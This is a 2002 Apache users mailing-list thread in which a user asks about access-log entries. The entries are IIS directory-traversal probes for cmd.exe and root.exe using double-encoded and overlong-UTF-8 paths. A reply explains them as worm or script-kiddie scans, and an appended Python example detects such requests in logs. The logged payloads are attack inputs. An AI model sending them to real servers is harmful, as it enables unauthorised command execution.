httpd-users mailing list archives

From eric.li...@t-online.de (eric)
Subject Re: Am I being probed?
Date Sun, 28 Jul 2002 16:53:12 GMT
Jack,

Thanks!

On Sunday 28 July 2002 18:01, Jack L. Stone wrote:
> At 06:03 PM 7.28.2002 +0200, eric wrote:
> >Greetings!
> >
> >I'm a newbie when it comes to many *nix things and Apache is one of them.
> >
> >I have two machines, one running Suse 8.0 and the other running WinME. 
> > Both of them are hooked up to a LinkSys EtherFast DSL router.  My Suse
> > box is running Apache 2.0.39.
> >
> >I use WinMe to connect to the web server.  Its address is 192.168.1.100
> > and the Suse box is 192.168.1.101.
> >
> >I was going through my Apache access log and found these entries:
> >
> >217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
> >/scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >and there's a few more.
> >
> >What's going on here?  Is there any way I can find out?  Should I bother?
> >Should I care?
> >
> >Thanks, Eric
>
> You would only need to care if you were running a WIN server... it is
> probably the "script kiddies" trying to wreak some havoc by trying to run
> their scripts (worm) on yours/any machine in its search on the net....
>
> Best regards,
> Jack L. Stone,
> Administrator
>
> SageOne Net
> http://www.sage-one.net
> jackstone@sage-one.net
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org

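Added example, not part of the original thread: one way to triage an Apache access log for the kind of requests quoted above, grouping them by client and checking whether any was answered with something other than an error. The sample lines are constructed from the entries in the message (the last one is an invented ordinary request from the LAN client); the tag names and function names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample, modelled on the entries quoted in the thread.
SAMPLE_LOG = """\
217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
192.168.1.100 - - [28/Jul/2002:14:00:00 +0200] "GET /index.html HTTP/1.0" 200 1456
"""
# client IP, request target, status code (common log format)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def decode_fully(raw: bytes, max_rounds: int = 5):
    """Percent-decode until nothing changes; return (bytes, rounds needed)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    return raw, rounds

def classify(target: str) -> set:
    """Tag a request target; an empty set means nothing suspicious was seen."""
    decoded, rounds = decode_fully(target.split("?", 1)[0].encode("utf-8"))
    tags = set()
    if rounds > 1:                       # e.g. %255c -> %5c -> backslash
        tags.add("multi-decode")
    if b"\xc0" in decoded or b"\xc1" in decoded:
        tags.add("invalid-utf8")         # 0xC0/0xC1 never begin valid UTF-8
    if re.search(rb"\.\.[/\\]", decoded):
        tags.add("traversal")
    if decoded.lower().endswith((b"cmd.exe", b"root.exe")):
        tags.add("win-shell")
    return tags

def summarize(log_text: str) -> dict:
    """Per client: tagged request count, how many got a non-error status, tags."""
    report = defaultdict(lambda: {"probes": 0, "served": 0, "tags": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        tags = classify(m.group(2)) if m else set()
        if tags:
            entry = report[m.group(1)]
            entry["probes"] += 1
            entry["tags"] |= tags
            entry["served"] += int(m.group(3)) < 400
    return dict(report)
```

A "served" count of zero corresponds to what the log above shows: every such request was answered with 404 or 400.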
